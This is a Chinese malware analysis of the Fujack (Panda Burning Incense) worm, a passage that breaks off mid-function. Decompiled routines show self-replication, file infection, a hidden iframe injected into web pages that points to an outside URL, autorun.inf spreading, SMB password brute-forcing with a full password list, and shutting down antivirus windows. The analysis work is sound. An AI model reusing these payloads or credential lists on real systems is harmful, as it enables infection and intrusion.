

熊猫烧香详解

1. 样本概况

该熊猫烧香加有fsg壳,利用局域网传播,感染主机可执行文件。

1.1 样本信息

病毒名称:xiongmao.vir

所属家族:Fujack

MD5值:512301c535c88255c9a252fdf70b7a03

SHA1值:ca3a1070cff311c0ba40ab60a8fe3266cfefe870

CRC32:E334747C

病毒行为:设置注册表实现自启动,向系统服务发送控制码,创建文件扩展名为exe的html文件,创建一个微改过的拷贝,修改资源管理器(explorer)的文件夹的隐藏属性,将文件属性设置为隐藏,检测系统内存大小,可能通过内存大小来判断是否运行在虚拟机中,在文件系统上创建可执行文件。

1.2 测试环境及工具

Win7 32位虚拟机,IDA,010editor,OllyDebug,exeinfo,LoadPE.

1.3 分析目标

2.具体行为分析

2.1 主要行为

火绒检测:

感染后文件:

比较被感染的可执行文件:

流程图

2.2 恶意代码分析

熊猫烧香是Delphi程序,需要注意:

  • IDA导入bds symbol。

  • Delphi默认的调用约定是,从右往左传参,前三个参数分别用寄存器 eax,edx,ecx ,超过三个的放在堆栈中,被调用者平衡堆栈。

  • Delphi也是可以内联汇编的。(asm...end...)

  • 字符串类型分为P(Pascal字符串),A(Ansi字符串),L

其他经验

  • 主要函数的分析时,可以暂时忽略返回值eax没有被保存或使用的调用。
  • mov 的目的地址是内存地址时需要重点关注。

2.3 恶意程序的代码分析片段

(1)sub_405250 解密

参数是两个字符串eax,edx,一个缓冲区ecx。

功能是把eax通过edx解密后放入ecx。

/*
 * sub_405250 -- string decryption routine (Hex-Rays pseudo-code with the
 * author's renames; not compilable as written).  Per the article: eax and edx
 * are two strings, ecx is the output buffer, and the result is stored through
 * LStrAsg into OutputDecryptedStr.
 * Each round XORs one byte of strKey with a byte of strXboy (indexed i % 4,
 * so presumably a 4-character key such as "xboy" -- confirm against the
 * binary), converts it with stosbEax2Edx and appends it to decryptedStrBuff.
 * Analyst note: understanding this routine lets a defender statically recover
 * the encrypted URLs shown later in the article without running the sample.
 */
if ( pStrKey ) /*pStrKEy is valid*/
  {
    int lenthofStrKey = GetpascalStrLenth(pStrKey); /*key length*/ 
    if ( lenthofStrKey > 0 )
    {
      int i = 1;
      int XorValue = 0;
      do
      {
        lenthofStrXboy = GetpascalStrLenth(pStrXboy);
        XorValue =(strXboy[i % 4d] % 10d) ^ (strKey[i-1])   /* note: the decompiler dump lacks the ';' here */
        stosbEax2Edx(
          10,           /* always 10 */
          XorValue,     /* the XorValue */
          &BufftoSaveXorValue/* buff to save XorValue */);
        LStrCat((char **)&decryptedStrBuff, BufftoSaveXorValue);
        ++i;
        --lenthofStrKey;
      }
      while ( lenthofStrKey );
    }
    /*save the _Out_ parameter*/
    System::__linkproc__ LStrAsg(OutputDecryptedStr, decryptedStrBuff);  
  }

需要查一下 stosbEax2Edx


三个主函数都没有参数

(2)sub_40819C 释放备份

Delphi 函数特点 eax是传入参数,用 mov 取值,edx 是传出参数,用 lea 取地址。

复制文件到新的目录:

运行新文件,并退出当前进程:

第一次运行

会在 系统目录 C:/Windows/System32/drivers 下 创建 病毒文件的拷贝 spo0lsv.exe 并运行,然后退出。

/*
 * First-run entry (the article renders sub_40819C as main()).
 * Decompiler pseudo-code with the author's renames; v-numbered temporaries are
 * decompiler artefacts.  Observed behaviour:
 *   1. If a "Desktop_.ini" exists next to the running executable, reset its
 *      attributes (0x80 = FILE_ATTRIBUTE_NORMAL) and delete it.
 *   2. Read the running file into memory; the loop below walks the image
 *      backwards while bytes are non-zero (purpose not shown here --
 *      presumably the infection-marker check used when an infected host runs).
 *   3. If that check yields nothing (!Always0): compare the running path with
 *      "<System32>\drivers\spo0lsv.exe"; when they differ, copy itself there,
 *      WinExec the copy and ExitProcess.
 * Defender notes: <System32>\drivers\spo0lsv.exe plus a sibling Desktop_.ini
 * are the primary on-disk indicators of the first-run stage.
 */
int main(){
  ParamStr(this, (char *)&v75);    /* 
                                   ** ParamStr(int index,_Out_ char* retValue);
                                   ** returns the index-th command-line parameter;
                                   ** eax = 0 ,edx = &var_238 = pathofVirusFile;
                                   */
  /* GetAppPath returns the directory part of the _In_ path */
  GetAppPath(pathofVirusFile_0, &dirofVirusFile);
  LStrCat((char **)&dirofVirusFile, "Desktop_.ini");
  if (FileExists(dirofVirusFile_afterStrcat) )/* does Desktop_.ini exist? FALSE means it does not */ 
  {
    System::ParamStr(pathofVirusFile_1, (char *)&v73);
    GetAppPath(v4, &v74);
    LStrCat((char **)&v74, "Desktop_.ini");
    v5 = (const CHAR *)LStrToPChar();
    j_SetFileAttributesA(v5, 0x80u);   /* 0x80 = FILE_ATTRIBUTE_NORMAL, clears hidden/system so it can be deleted */
    j_Sleep(1u);
    System::ParamStr(v6, (char *)&v71);
    GetAppPath(v7, &v72);
    System::__linkproc__ LStrCat((char **)&v72, "Desktop_.ini");
    v8 = (const CHAR *)System::__linkproc__ LStrToPChar();
    j_DeleteFileA(v8);
  }
  ParamStr(pathofVirusFile_1, (char *)&v70);
  /* 
  ** ReadVirusFileToAnsiStr(_In_ AnsiString filePath,_Out_ char* pFileStr)
  ** var_1 = pFileStr
  ** may gather more information, but the only out-parameter is pFileStr
  */
  ReadVirusFileToAnsiStr(pathofVirusFile_2, &pFileStr);/*Also read Import dir to memory */ 
  LStrClr();
  for ( i = GetpascalStrLenth(pFileStr); i > 0 && *(_BYTE *)(pFileStr + i - 1); --i )// walk the image backwards over non-zero bytes
  {
    v12 = pFileStr;
    LOBYTE(v12) = *(_BYTE *)(pFileStr + i - 1);
    stosbEax2Edx(pathofVirusFile_3, v12, (char **)&v69);
    LStrCat3(Always0, v69);
  }
  if ( !Always0 ) /* nothing collected above: this is a clean first run */ 
  {
    ParamStr(pathofVirusFile_3, (char *)&v67);
    AnsiUpperCase(pathofVirusFile_3Upper);
    GetDir_System32(v68, v52);
    LStrCatN(dirSystem32, (char *)3, "spo0lsv.exe", "drivers\\", v65);   /* target = <System32>\drivers\spo0lsv.exe */
    AnsiUpperCase(v15);
    LStrCmp((int)IsFalse, v66);  /* confirm which exe is running (case-insensitive via AnsiUpperCase above) */
    if ( !v16 )                  /* not running as spo0lsv.exe */ 
    {
      sub_405FC4(); /*use Tlhelp enume process;search spo0lsv.exe*/ 
      sub_405FC4();
      GetDir_System32(128, v52);
      System::__linkproc__ LStrCatN(dirSystem32_1, (char *)3, "spo0lsv.exe", "drivers\\", v64);
      v18 = (const CHAR *)System::__linkproc__ LStrToPChar();
      j_SetFileAttributesA(v18, (DWORD)IsFalse);
      j_Sleep(1);
      GetDir_System32(0, v52);
      LStrCatN(dirSystem32_2, (char *)3, "spo0lsv.exe", "drivers\\", v63);
      NewFileName = (const CHAR *)System::__linkproc__ LStrToPChar();
      ParamStr(pathofVirusFile_4, (char *)&v62);
      ExistingFileName = (const CHAR *)System::__linkproc__ LStrToPChar();
      j_CopyFileA(ExistingFileName, NewFileName, (BOOL)IsFalse);   /* self-copy; bFailIfExists == FALSE overwrites */
      GetDir_System32(1, v52);
      LStrCatN(dirSystem32_3, (char *)3, "spo0lsv.exe", "drivers\\", v61);
      v23 = (const CHAR *)System::__linkproc__ LStrToPChar();
      j_WinExec(v23, (UINT)IsFalse);   /* launch the copy, then the original process exits */
      j_ExitProcess_0(0);
    }
  }
}

FileExists(char* Name) returns a boolean: TRUE if the file exists, FALSE otherwise.

第二次执行 即 spolsv.exe 执行

/*
 * sub_40819C as it runs on the second launch (i.e. as spo0lsv.exe).
 * Same prologue as the first run: build the Desktop_.ini path, read the own
 * file, compare the running path against "<System32>\drivers\spo0lsv.exe".
 * The self-copy branch is elided by the author ("pass it") because it is not
 * taken here.  The tail then works on the in-memory image (LStrDelete /
 * unknown_libname_77) before clearing the string temporaries.
 * The unknown_libname_* calls are unresolved Delphi RTL routines -- their
 * exact purpose is not shown here.
 */
int __thiscall sub_40819C(void *this)
{
  System::ParamStr(this);
  unknown_libname_89(v1, &v79);
  System::__linkproc__ LStrCat(v2, "Desktop_.ini");
  System::ParamStr(v4);
  sub_407650(v12, &v85);
  System::__linkproc__ LStrClr();
  if ( !v84 )
  {
    System::ParamStr(v13);
    Sysutils::AnsiUpperCase(v16);
    sub_4053AC(v75);
    System::__linkproc__ LStrCatN(v17, 3, "spo0lsv.exe", "drivers\\", v73);
    Sysutils::AnsiUpperCase(v18);
    System::__linkproc__ LStrCmp(v19, v74); // running path == spo0lsv.exe path on this launch
    if ( !v20 ) // self-copy branch, not taken on the second run
    {/*...*/}
  }
  v30 = unknown_libname_75(v84);
  LStrDelete(v30, i);      // removes part of the in-memory image only; the file on disk is untouched
  v49 = unknown_libname_77(v48, v84);
  if ( v49 > 0 )
  {/*...*/}
  v51 = v63;
  v63 = (int *)&loc_408788;
  LStrArrayClr(v51, 29);
  return LStrArrayClr(v52, 5);
}

(3.1)sub_40D18C 主体1 感染文件

Fun2 是一个递归函数,要遍历所有文件

对 Desktop_.ini 的修改

很多的 if 其实改成 for 循环 遍历字符串数组就没这么麻烦了

/*
 * v_EnumeFiles (sub_40D18C, body 1) -- recursive directory walker that carries
 * out the file-infection stage.  Decompiler pseudo-code with the author's
 * renames; the v-numbered temporaries are not real variables.
 * Behaviour visible below:
 *   - appends "\" and "*.*" to DriverPath and enumerates with FindFirst/FindNext
 *     (63 = Delphi faAnyFile);
 *   - for sub-directories (attribute 0x10 = FILE_ATTRIBUTE_DIRECTORY), skips a
 *     fixed list of system/product folders (the LStrCmp chain), creates or
 *     refreshes a hidden "Desktop_.ini" marker holding the current date, then
 *     recurses into the directory;
 *   - for files, deletes ".gho" images and, for files under 10485760 bytes
 *     (10 MiB), dispatches by extension: exe/scr/pif/com -> InfectionExe,
 *     htm/html/asp/php/jsp/aspx -> InfectScript.
 * Defender notes: a hidden Desktop_.ini containing a date in every visited
 * directory is a cheap on-disk indicator; the folder skip-list explains why
 * Windows system directories stay clean while user data is hit.
 */
int __usercall v_EnumeFiles@<eax>(int a1@<eax>)
{
  lenthofDriver = GetpascalStrLenth((int)DriverPath);
  if ( DriverPath[lenthofDriver - 1] != '\\' )
    System::__linkproc__ LStrCat(&DriverPath, "\\");// add '\\'
  System::__linkproc__ LStrCat3("*.*", DriverPath, filePath, v155, Is3);// add *.*
  if ( !Sysutils::FindFirst(&v249, 63) )   // 63 = faAnyFile: match every file and directory
  {
    while ( (v250 & 0x10) == 0x10 && *(_BYTE *)PathName != '.' )   // directory entries only, skipping "." / ".."
    {
      // Skip-list: the worm does not descend into these folders.
      LStrCmp(v4, *(int *)v246);// "WINDOWS"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v8, *(int *)v244);//  "WINNT"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v11, *(int *)v242);// "system32"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v14, *(int *)v240);// "Documents and Settings"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v17, *(int *)v238);// "System Volume Information"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v20, *(int *)v236);// "System Volume Information"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v23, *(int *)v234);//  "Recycled"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v26, *(int *)v232);// "Windows NT"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v29, *(int *)v230);// "WindowsUpdate"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v32, *(int *)v228);// "Windows Media Player"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v35, *(int *)v226);// "Outlook Express"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v38, *(int *)v224);// Internet Explorer
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v41, *(int *)v222);//  "NetMeeting"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v44, *(int *)v220);// "NetMeeting"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v47, *(int *)v218);//  "Common Files"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v50, *(int *)v216);// "ComPlus Applications"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v53, *(int *)v214);// Common Files"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v56, *(int *)v212);// "Messenger"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v59, *(int *)v210);// "InstallShield Installation Information"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v62, *(int *)v208);// "MSN"
      if ( IstheSame )
        goto _FindNext;
      LStrCmp(v65, *(int *)v206);// "Microsoft Frontpage"
      if ( IstheSame )
        goto _FindNext;
      LStrCatN(v67, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);// does <dir>\Desktop_.ini exist?
      if ( !(unsigned __int8)Sysutils::FileExists(v68) )// not present: create the marker
      {
        LStrCatN(v69, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
        j_SetFileAttributesA(v89, v90);
        j_Sleep(1u);
        j_GetLocalTime(&SystemTime);
        sub_40576C(v91);/* get year, month, day */
        sub_40576C(v92);
        v93 = v199;
        sub_40576C(v94);
        LStrCatN(v95, (char *)5, (char *)v198, dword_40A3D0, v93);
        LStrCatN(v96, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
        ShowSQLWindow(v97, v197);/* IDA mislabel: writes today's date into Desktop_.ini */
        j_SetFileAttributesA(v99, v100);/* set Desktop_.ini attributes (hidden per the article) */
        j_Sleep(1u);
LABEL_32:
        LStrCat3(PathName, DriverPath, filePath, v155, Is3);
        v_EnumeFiles(v196); /* recurse into the sub-directory */ 
LABEL_59:
        j_Sleep(0x14u);
        goto _FindNext;
      }  // marker present: check whether it is from today
      LStrCatN(v69, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
      ReadFileToAnsiStr(v70, &v253);
      j_GetLocalTime(&SystemTime);      // get 0000  0000  0000 0000   0000    0000  0000 0000
                                        //     month year  day  min(x0)min(0x) hour   second
      sub_40576C(v71);// get year, month, day
      sub_40576C(v72);
      v73 = v205;
      sub_40576C(v74);
      LStrCatN(v75, (char *)5, v204, dword_40A3D0, v73);/* build the date the virus runs on, like 2003-9-11 */
      LStrCmp(v253, v252); // compare the Desktop_.ini content with today's date
      if ( !IstheSame )
      {
        // stale marker: rewrite it with today's date, then recurse
        LStrCatN(v76, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
        j_SetFileAttributesA(v77, v78);
        j_Sleep(1u);
        j_GetLocalTime(&SystemTime);
        LStrCatN(v83, (char *)5, v201, dword_40A3D0, v81);
        LStrCatN(v84, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
        Mxdsql::ShowSQLWindow(v85, v200);
        LStrCatN(v86, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
        j_SetFileAttributesA(v87, v88);
        j_Sleep(1u);
        goto LABEL_32;
      }
      LStrCat3(PathName, DriverPath, filePath, v155, Is3);
      EnumeDir(v203); /* same-day marker: author notes this path behaves like a loop that never leaves */ 
_FindNext:
      if ( Sysutils::FindNext((int)&v249) )
        goto _FindClose;
    }/*end while*/
    if ( *(_BYTE *)PathName != '.' ) /* plain file entry: infection dispatch */ 
    {
      getfilesuffix(v3, &v194); /*get filename suffix*/ 
      LStrCmp(v195, (int)"GHO");/* Ghost backup images are deleted outright, defeating restore-from-image */ 
      if ( IstheSame )
      {
        j_DeleteFileA(v102);
      }
      System::__linkproc__ LStrCat3(PathName, DriverPath, filePath, v155, Is3);
      if ( getFilesize(filePath) < 10485760 )   // only files smaller than 10 MiB are touched
      {
        LStrCmp(v104, *(int *)v192);// "setup.exe"
        if ( IstheSame )
          goto _FindNext;
        LStrCmp(v107, *(int *)v190);// "NTDETECT.COM"
        if ( IstheSame )
          goto _FindNext;
        getfilesuffix(v109, &v188);
        LStrCmp(v111, *(int *)v187);// .exe
        if ( IstheSame )
        {
          InfectionExe();
        }
        getfilesuffix(v113, &v185);
        LStrCmp(v115, *(int *)v184);// .scr
        if ( IstheSame )
        {
          InfectionExe();
        }
        getfilesuffix(v117, &v182);
        LStrCmp(v119, *(int *)v181);// .pif
        if ( IstheSame )
        {
          InfectionExe();
        }
        getfilesuffix(v121, &v179);
        LStrCmp(v123, *(int *)v178);// .com
        if ( IstheSame )
        {
          InfectionExe();
        }
        getfilesuffix(v125, &v176);
        LStrCmp(v127, *(int *)v175);// .htm
        if ( IstheSame )
        {
          InfectScript();
        }
        getfilesuffix(v129, &v173);
        LStrCmp(v131, *(int *)v172);// .html
        if ( IstheSame )
        {
          InfectScript();
        }
        getfilesuffix(v133, &v170);
        LStrCmp(v135, *(int *)v169);// .asp
        if ( IstheSame )
        {
          InfectScript();
        }
        getfilesuffix(v137, &v167);
        LStrCmp(v139, *(int *)v166);// .php
        if ( IstheSame )
        {
          InfectScript();
        }
        getfilesuffix(v141, &v164);
        LStrCmp(v143, *(int *)v163);// .jsp
        if ( IstheSame )
        {
          InfectScript();
        }
        getfilesuffix(v145, &v161);
        LStrCmp(v147, *(int *)v160);// .aspx
        if ( IstheSame )
        {
          InfectScript();
        }
      }
    }
    goto LABEL_59;
  }
_FindClose:
  Sysutils::FindClose();
  // Everything below is Delphi try/finally teardown (SEH frame restore and
  // string-temporary cleanup), not worm behaviour.
  __writefsdword(0, (unsigned int)filePath);
  v149 = v159;
  __writefsdword(0, v157);
  v159 = (int *)&loc_40A1A0;
  System::__linkproc__ LStrArrayClr(v149, 99);
  System::__linkproc__ LStrClr();
  System::__linkproc__ LStrClr();
  System::__linkproc__ LStrArrayClr(v150, 9);
  System::__linkproc__ FinalizeRecord(v151, &byte_407494);
  return System::__linkproc__ LStrArrayClr(v152, 3);
}

感染可执行文件

回收站的编号 S-1-5-21-2427704308-2084052474-1429875048-1000

<!-- placeholder removed -->

感染脚本

key :search
encrypted:
3D 6E 62 7B 65 6E 64 27 77 7B 67 3E 69 73 70 79 | =nb{end'w{g>ispy
3E 2C 2E 70 73 7E 2A 62 62 3F 32 27 67 6D 2E 31 | >,.ps~*bb?2'gm.1
32 26 6D 6D 65 62 7C 27 6C 77 6C 27 73 60 60 77 | 2&mmeb|'lwl's``w
69 3A 26 39 26 23 69 62 6D 6E 6C 77 3C 25 34 2B | i:&9&#ibmnlw<%4+
 A 3F 2E 6E 62 7B 65 6E 64 39                   | :?.nb{end9
decrypted:
3C 69 66 72 61 6D 65 20 73 72 63 3D 68 74 74 70 | <iframe src=http
3A 2F 2F 77 77 77 2E 61 63 38 36 2E 63 6E 2F 36 | ://www.ac86.cn/6
36 2F 69 6E 64 65 78 2E 68 74 6D 20 77 69 64 74 | 6/index.htm widt
68 3D 22 30 22 20 68 65 69 67 68 74 3D 22 30 22 | h="0" height="0"
3E 3C 2F 69 66 72 61 6D 65 3E                   | ></iframe>

感染结果

int __usercall InfectScript@<eax>(int a1@<eax>, int a2@<ebx>, int a3@<edi>, int a4@<esi>)
{
  malLink = 0;/*ebp-0x8*/
  ReadFileToAnsiStr(v22, (char **)&filebuff, a2, a3, a4);
  /*decrypted the hardcode in virusfile to malLink*/
  decryptedFun((int)&byte_407B04/*encrypted content*/, 
      (int)"Search"/*key*/, (volatile signed __int32 *)&malLink);  
  if ( !LStrPos(malLink, filebuff) )
  {
    if ( FileExists(v5) )
    {
      FileOpen(v6, 1u);
      setFilePoint(2u, 0, v7); /*set point to file's end*/  
      LStrCatN(v8, (char *)3, dword_407B64, dword_407B58, malLink);
      length = (unsigned int)GetpascalStrLenth((int)malLink);
      fwirteScript(v11, length);
      CloseHandle();
    }
  }
}

(3.2)sub_40D18C 持久化

通过设置 autorun.inf,使任何点击磁盘自动运行 setup.exe,而该文件已被修改为病毒的copy。

void TimerFunc(void *a1, unsigned int a2, int a3)
{
  _GetNumberofDiskDriver((char **)&bufofDiskName, v3, a1, a2, a3);
  if ( !bufofDiskName                                   || 
       numberofDisks = GetpascalStrLenth(bufofDiskName) || 
       numberofDisks < 1
  ){
    return;
  }
  while ( 1 )// run the number of diskdriver, for z to a
  {
    i = numberofDisks - 1;
    if (LStrPos(bufofDiskName[i], "A") )/*A:*/ 
    {
        break;
    }
    if ( __linkproc__ LStrPos(bufofDiskName[i], "B") )/*B:*/ 
    {
        break;
    }
    LStrCat3(":\\setup.exe", LStrPos(bufofDiskName[i], buff1, 2);
    LStrCat3(":\\autorun.inf", LStrPos(bufofDiskName[i], buff2, 2);
    if ( FileExists(v19) )/* examine if setup.exe is exist*/
    { // is exist
      System::ParamStr(v20, v58);
      readfile_(*(int *)v58, (char **)&bufofvirus, numberofDisks, a2, a3);
      readfile_(v68, (char **)&bufofSetupExe, numberofDisks, a2, a3);
      LStrCmp(bufofvirus, bufofSetup.exe);/*examine if the setup.exe is virus file*/ 
      if ( !v22 ) /*not same delete oringnal file then copy virus to it*/ 
      {
        j_SetFileAttributesA((LPCSTR)a3, (DWORD)v49);
        if ( !j_DeleteFileA((LPCSTR)a3) )
        {
           continue;
        }
        if ( !j_CopyFileA(v26, v48, (BOOL)v49) )
        {
          continue;
        }
      }
    }
    else  
    { /*if setup.exe is not exist copy the runing file to setup.exe*/ 
      ParamStr(0, buff);
      if ( !j_CopyFileA(v29, v48, (BOOL)v49) ) /* copy virus to setup.exe*/ 
      {
        continue;
      }
    }  /*end setup.exe if*/                                        
    if (!FileExists(v21))/*examine if autorun.inf is exist*/ 
    { /*not exist*/ 
      LStrToPChar(0x40000000, 0, 0, 2, 0, 0);
      hFile = j_CreateFileA_0(/*...*/);
      j_CloseHandle_0(hFile);
      /* modify the autorun.inf*/
      fwirte(v37, 
          "[AutoRun]\r\n
          OPEN=setup.exe\r\n
          shellexecute=setup.exe\r\n
          shell\\Auto\\command=setup.exe\r\n"
      );
    }
    else
    {/*is exist*/ 
    readfile_(v69, (char **)&v65, numberofDisks, a2, a3);
    ret = LStrCmp(
      v65,
      (int)"[AutoRun]\r\n
            OPEN=setup.exe\r\n
            shellexecute=setup.exe\r\n
            shell\\Auto\\command=setup.exe\r\n");
        if (!ret)
        {
        continue; /*if has the same content to setup.exe break*/  
        }
        else
        {/*not the same delte the oringinal and create a new one*/
            j_SetFileAttributesA((LPCSTR)a3, (DWORD)v49);
              if ( j_DeleteFileA((LPCSTR)a3) )
              {
                v31 = j_CreateFileA_0((LPCSTR)a3, 0x40000000u, 0, 0, 2u, 0, 0);
                j_CloseHandle_0(v31);
                fwirte(v33, 
                       "[AutoRun]\r\n
                       OPEN=setup.exe\r\n
                       shellexecute=setup.exe\r\n
                       shell\\Auto\\command=setup.exe\r\n"
                );
              }
            else
            {
                continue;
            }    
        }
    }
    j_SetFileAttributesA(v39, 0x7);  /*set setup.exe file attribute 0x7*/ 
    j_SetFileAttributesA(v40, 0x7);  /*set autorun.inf file attribute 0x7*/ 
    if ( !--numberofDisks ) break;
  } // end while                                              
}

(3.3)网络传播

尝试连接

void __usercall sub_40B864(int a1@<eax>)
{
  while ( 1 )
  {
    while ( !j_InternetGetConnectedState(0, 0) )
    j_Sleep(1000u);
    sub_40B520(v18, v1); // copy ip to mem in 4 dword 
    j_socket(FWP_AF_ETHER, IRDA_PROTO_SOCK_STREAM, IPPROTO_TCP);
    name.sa_family = 2;
    name.sa_data[0] = j_htons(139u);
    name.sa_data[2] = j_inet_addr(v4);
    if ( j_connect(v2, &name, 16) == -1 )
    {
      j_socket(2, 1, 6);
      name.sa_family = 2;
      name.sa_data[0] = j_htons(445u);
      name.sa_data[2] = j_inet_addr(v7);
      if ( j_connect(v5, &name, 16) != -1 )
      {
        j_closesocket(v5);
        sub_40B40C(v18, *(_DWORD *)(v18 + 24));
      }
    } 
    else
    {
      j_closesocket(v2);
      sub_40B40C(v18, *(_DWORD *)(v18 + 24));
    }
    j_Sleep(0x200u);
  }
}

暴力破解

int __usercall sub_40B40C@<eax>(int a1@<eax>, int a2@<edx>)
{
  /*网络连接结构体的初始化*/
  NetResource.dwScope = 1;
  NetResource.dwType = 0;
  NetResource.lpLocalName = 0;
  NetResource.lpRemoteName = LStrToPChar()
  NetResource.lpProvider = 0;
  j_GetModuleHandleA_0(0);  /*get handle of virus' main module */ 
  if ( sub_40A7F4() )
  {
    nUsrName = 3;        
    nPasswd = 101;                  
  }
  else
  {
    nUsrName = 0;
    nPasswd = 0;
  }
  i = nUsrName + 1;/*4 is num of usrname*/ 
  usrname = &arryUserName; /*addr of arry[3] which save usrname*/  
  while ( i )
  {
    j = nPasswd + 1;/*102 is num of passwd*/
    passwd = &arryPasswd;
    while ( j )
    {
      if ( !j_WNetAddConnection2A(&NetResource, *passwd[j], *usrname[i], dwFlag) )
      {
         webInfection(v29); 
      }  
      j_WNetCancelConnectionA(NetResource.lpRemoteName, -1);
      passwd ++;
      --j;
    }
    ++usrname;
    --i;
  }
  return;
}
Passwd:
1234:password:6969:harley:123456:golf:pussy:mustang
1111:shadow:fish:5150:7777:qwerty:baseball:2112:
letmein:12345:ccc:admin:5201314::1:12:123
1234567:123456789:654321:54321:111:000000:abc:pw
11111111:88888888:pass:passwd:data::abcd:abc123:sybase
123qwe:server:computer:520:super:123asd:0:ihavenopass:godblessyou
enable:xp:2002:2003:2600:alpha:110:111111
121212:123123:1234qwer:123abc:007:aaa:patrick:pat:administrator
root:sex:god:fuckyou:fuck:test:test123:temp:
temp123:win:asdf::qwer:yxcv:zxcv:home:xxx
owner:login:Login:pw123:love::mypc123::mypass::901100

Usrname:
Administrator:Guest:admin:Root

IDA 设置函数形式:

int __usercall webInfection@<eax>(int a1@<eax>, int a2@<ebx>, int a3@<edi>, int a4@<esi>)

ADMIN$是管理共享,默认指向系统文件夹(如 C:\WINDOWS);IPC$ 是 IPC 管道,用于远程系统管理;C$、D$ 等以盘符开头的共享指向盘符根目录,如 C:\、D:\ 。

// write access to const memory has been detected, the output may be wrong!
int __usercall webInfection@<eax>(int a1@<eax>)
{
  GetMem(260);
  while ( v53 == 234 );
  {
    while ( v41 );
    {
      while ( 1 )
      {
LABEL_26:
        ++v40;
        if ( !--v46 )
          goto LABEL_27;
      }
      sub_404610(v5, (int)&lpNewFileName, v49);
      v25 = lpNewFileName;
      v24 = "\\";
      LStrCatN(v8, (char *)5, "GameSetup.exe", *v40, v50);
      GetDir_System32(v9, (int)v26);
      LStrCatN(v10, (char *)3, "spo0lsv.exe", "drivers\\", v36);
      j_CopyFileA(v11, v25, (BOOL)v26);// copy virus to shareDir ADMIN$ is C:/WINDOWS
      GetMem(1025);
      GetMem(257);
      GetMem(16);
      GetMem(4);     // alloc 4 page of mem
      LStrCatN(v14, (char *)5, "GameSetup.exe", *v40, v50);
      sub_40A608(v16);// jmp 74B06C01h 然后就崩了
      v44 = 1000 * (60 * *(_DWORD *)(v42 + 12) + 3600 * *(_DWORD *)(v42 + 8));
      v18 = *(_DWORD *)(v42 + 24);
      if ( v18 != -1 )
        v44 -= 60000 * v18;
      v44 += 120000;
      if ( (unsigned int)v44 > 0x5265C00 )
        v44 -= 86400000;
      if ( sub_40A7F4() )
        v0(v42);
      *(_DWORD *)v1 = v44;
      *(_DWORD *)(v1 + 4) = 0;
      *(_BYTE *)(v1 + 8) = 0;
      *(_DWORD *)(v1 + 12) = v3;
      *(_BYTE *)(v1 + 9) = 1;
      sub_40A600(v2, v1, (int)&v43);
      FreeMem();
      FreeMem();
      FreeMem();
      if ( v19 )
      {
       dword_40E0EC = 1;
       if ( v45 != 1 && !(unsigned __int8)sub_4050C0(v5, v50) )
       {
          LStrCatN(v20, (char *)3, v50, "\\", v33);
          v_EnumeFiles(v34, v1, v2, v3);/*感染文件的函数*/
       }
      }
      if ( *(_DWORD *)(v47 + 4) != 1 )
        v47 += 12;
      if ( v45 == 1 )
        break;
      --v41;
    } 
  }
  FreeMem();
  return;
}
sub_40A608(v16);// jmp 74B06C01h 然后就崩了         
      v44 = 1000 * (60 * *(_DWORD *)(v42 + 12) + 3600 * *(_DWORD *)(v42 + 8));
      v18 = *(_DWORD *)(v42 + 24);
      if ( v18 != -1 )
        v44 -= 60000 * v18;
      v44 += 120000;
      if ( (unsigned int)v44 > 0x5265C00 )
        v44 -= 86400000;
      if ( sub_40A7F4() )
        v0(v42);
      *(_DWORD *)v1 = v44;
      *(_DWORD *)(v1 + 4) = 0;s
      *(_BYTE *)(v1 + 8) = 0;
      *(_DWORD *)(v1 + 12) = v3;
      *(_BYTE *)(v1 + 9) = 1;
      sub_40A600(v2, v1, (int)&v43);//这个地址也不对 73BA19D1h

(4)sub_40819C 几个小TimeFunc

(4.1) sub_40CEE4 修改注册表 根据窗口关闭安全软件

void __stdcall sub_40CEE4()
{
  sub_406E2C();
  GetDir_System32(v3, (int)v4);
  LStrCatN(v0, (char *)3, "spo0lsv.exe", "drivers\\", v6);
  v1 = LStrToPChar(v3, v4, v5, v6, v7, savedregs);
  /* 把spo0lsv.exe加入自启动 */
  sub_4051BC("svcshare", "Software\\Microsoft\\Windows\\CurrentVersion\\Run", v1);
  sub_4059F0(0,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue");
}

关闭安全软件

int __stdcall sub_4061B8()
{
  sub_406108();/*获得管理员权限*/
  v0 = 0;
  v1 = j_GetDesktopWindow();
  do
  {
    j_FindWindowExA(v1, v0, 0, 0);
    j_GetWindowTextA(v0, &String, 101);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("防火墙", v45) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("进程", v44) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("VirusScan", v43) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("NOD32", v42) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
